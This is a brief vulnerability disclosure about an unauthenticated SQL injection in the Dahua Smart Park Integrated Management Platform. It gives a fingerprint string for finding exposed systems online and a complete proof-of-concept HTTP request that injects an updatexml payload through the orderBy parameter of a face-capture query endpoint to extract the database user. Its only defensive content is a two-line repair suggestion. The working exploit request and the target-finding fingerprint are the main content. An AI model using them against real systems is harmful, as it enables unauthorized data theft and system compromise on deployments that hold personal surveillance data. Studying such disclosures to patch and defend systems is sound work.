0x01 Product Introduction
"Dahua Smart Park Integrated Management Platform" is a comprehensive management platform with functions such as park operation, resource allocation, and intelligent services. The platform is intended to assist in optimizing the resource allocation of the park to meet diversified management needs, and at the same time enhance the user experience by providing intelligent services.
0x02 Vulnerability Overview
The comprehensive management platform of Dahua Smart Park did not effectively filter user input, but directly spliced it into SQL query statements, resulting in SQL injection vulnerabilities in the system. A remote unauthorized attacker can exploit this vulnerability to obtain sensitive information, and further exploit it to obtain the target system privileges.
0x03 Recurrence environment
Intergraph fingerprint: web.body="/WPMS/asset/lib/gridster/"
0x04 Vulnerability Reappearance
PoC
GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
query current user
0x05 Repair suggestion
Limit access source addresses, and do not open the system to the Internet unless necessary.
Patch out ASAP!